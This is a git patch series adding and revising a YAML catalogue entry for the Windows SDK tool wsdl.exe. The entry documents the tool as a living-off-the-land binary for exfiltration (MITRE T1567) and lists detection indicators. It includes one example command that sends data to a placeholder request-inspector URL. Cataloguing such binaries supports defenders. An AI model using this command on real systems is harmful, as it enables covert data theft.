From 12165e0db019d320fc5f0fedea23a09e24e34122 Mon Sep 17 00:00:00 2001 From: teixeira0xfffff <50772593+teixeira0xfffff@users.noreply.github.com> Date: Sat, 15 Jul 2023 09:36:30 -0300 Subject: [PATCH 1/4] Create Wsdl.yml --- yml/OtherMSBinaries/Wsdl.yml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 yml/OtherMSBinaries/Wsdl.yml diff --git a/yml/OtherMSBinaries/Wsdl.yml b/yml/OtherMSBinaries/Wsdl.yml new file mode 100644 index 00000000..bf5b89cb --- /dev/null +++ b/yml/OtherMSBinaries/Wsdl.yml @@ -0,0 +1,31 @@ +--- +Name: wsdl.exe +Description: The Web Services Description Language(WSDL) is an XML-based interface description language that is used for describing the functionality offered by a web service. The acronym is also used for any specific WSDL description of a web service (also referred to as a WSDL file), which provides a machine-readable description of how the service can be called, what parameters it expects, and what data structures it returns. Therefore, its purpose is roughly similar to that of a type signature in a programming language. +Author: 'Ialle Teixeira' +Created: 2022-03-28 +Commands: + - Command: wsdl.exe /server https://requestinspector.com/insp/inspect/XXXXXXXXXXXXXXX + Description: Upload file, credentials or data exfiltration in general + Usecase: Upload file + Category: Upload + Privileges: User + MitreID: T1567 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wsdl.exe +Code_Sample: + - Code: +Detection: + - IOC: wsdl.exe storing data into alternate data streams. + - IOC: Preventing/Detecting wsdl.exe with non-RFC1918 addresses by Network IPS/IDS. + - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching wsdl.exe file. + - IOC: User Agent is "Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 4.0.30319.42000)" +Resources: + - Link: https://docs.microsoft.com/en-us/windows/win32/wsw/portal + - Link: https://en.wikipedia.org/wiki/Web_Services_Description_Language + - Link: https://social.msdn.microsoft.com/Forums/pt-BR/e15ce975-49c4-4aae-9b26-d66dc34ea122/como-utilizar-wsdlexe?forum=aspnetpt + - Link: https://pt.stackoverflow.com/questions/29116/o-que-%C3%A9-wsdl-web-services-description-language +Acknowledgement: + - Person: Ialle Teixeira + Handle: 'in@isdebuggerpresent' +--- From 58aa8038aaffee904ce3c6b58056dd04751a18c1 Mon Sep 17 00:00:00 2001 From: teixeira0xfffff <50772593+teixeira0xfffff@users.noreply.github.com> Date: Sat, 15 Jul 2023 09:40:58 -0300 Subject: [PATCH 2/4] Update Wsdl.yml --- yml/OtherMSBinaries/Wsdl.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/yml/OtherMSBinaries/Wsdl.yml b/yml/OtherMSBinaries/Wsdl.yml index bf5b89cb..b144a4a5 100644 --- a/yml/OtherMSBinaries/Wsdl.yml +++ b/yml/OtherMSBinaries/Wsdl.yml @@ -28,4 +28,3 @@ Resources: Acknowledgement: - Person: Ialle Teixeira Handle: 'in@isdebuggerpresent' ---- From 5e44b04b4187a52a9b6629adce26abc359665f25 Mon Sep 17 00:00:00 2001 From: Wietze Date: Sat, 5 Aug 2023 18:47:18 +0100 Subject: [PATCH 3/4] Update Wsdl.yml --- yml/OtherMSBinaries/Wsdl.yml | 16 ++++++---------- 1 file changed, 6 insertions(+), 10 deletions(-) diff --git a/yml/OtherMSBinaries/Wsdl.yml b/yml/OtherMSBinaries/Wsdl.yml index b144a4a5..fa5f2388 100644 --- a/yml/OtherMSBinaries/Wsdl.yml +++ b/yml/OtherMSBinaries/Wsdl.yml @@ -1,22 +1,19 @@ --- Name: wsdl.exe -Description: The Web Services Description Language(WSDL) is an XML-based interface description language that is used for describing the functionality offered by a web service. The acronym is also used for any specific WSDL description of a web service (also referred to as a WSDL file), which provides a machine-readable description of how the service can be called, what parameters it expects, and what data structures it returns. Therefore, its purpose is roughly similar to that of a type signature in a programming language. -Author: 'Ialle Teixeira' +Description: .NET Frameworks WebService install and administration tool +Author: Ialle Teixeira Created: 2022-03-28 Commands: - Command: wsdl.exe /server https://requestinspector.com/insp/inspect/XXXXXXXXXXXXXXX - Description: Upload file, credentials or data exfiltration in general - Usecase: Upload file + Description: "Exfiltrate data via a HTTP web request's URL." + Usecase: Exfiltrate data Category: Upload Privileges: User MitreID: T1567 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wsdl.exe -Code_Sample: - - Code: -Detection: - - IOC: wsdl.exe storing data into alternate data streams. +Detection: - IOC: Preventing/Detecting wsdl.exe with non-RFC1918 addresses by Network IPS/IDS. - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching wsdl.exe file. - IOC: User Agent is "Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 4.0.30319.42000)" @@ -27,4 +24,3 @@ Resources: - Link: https://pt.stackoverflow.com/questions/29116/o-que-%C3%A9-wsdl-web-services-description-language Acknowledgement: - Person: Ialle Teixeira - Handle: 'in@isdebuggerpresent' From a747e26c879de60825c0fb873b9498ede868496f Mon Sep 17 00:00:00 2001 From: Wietze Date: Sat, 5 Aug 2023 18:49:28 +0100 Subject: [PATCH 4/4] Removing trailing spaces --- yml/OtherMSBinaries/Wsdl.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OtherMSBinaries/Wsdl.yml b/yml/OtherMSBinaries/Wsdl.yml index fa5f2388..b377e907 100644 --- a/yml/OtherMSBinaries/Wsdl.yml +++ b/yml/OtherMSBinaries/Wsdl.yml @@ -1,6 +1,6 @@ --- Name: wsdl.exe -Description: .NET Frameworks WebService install and administration tool +Description: .NET Frameworks WebService install and administration tool Author: Ialle Teixeira Created: 2022-03-28 Commands: @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wsdl.exe -Detection: +Detection: - IOC: Preventing/Detecting wsdl.exe with non-RFC1918 addresses by Network IPS/IDS. - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching wsdl.exe file. - IOC: User Agent is "Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 4.0.30319.42000)"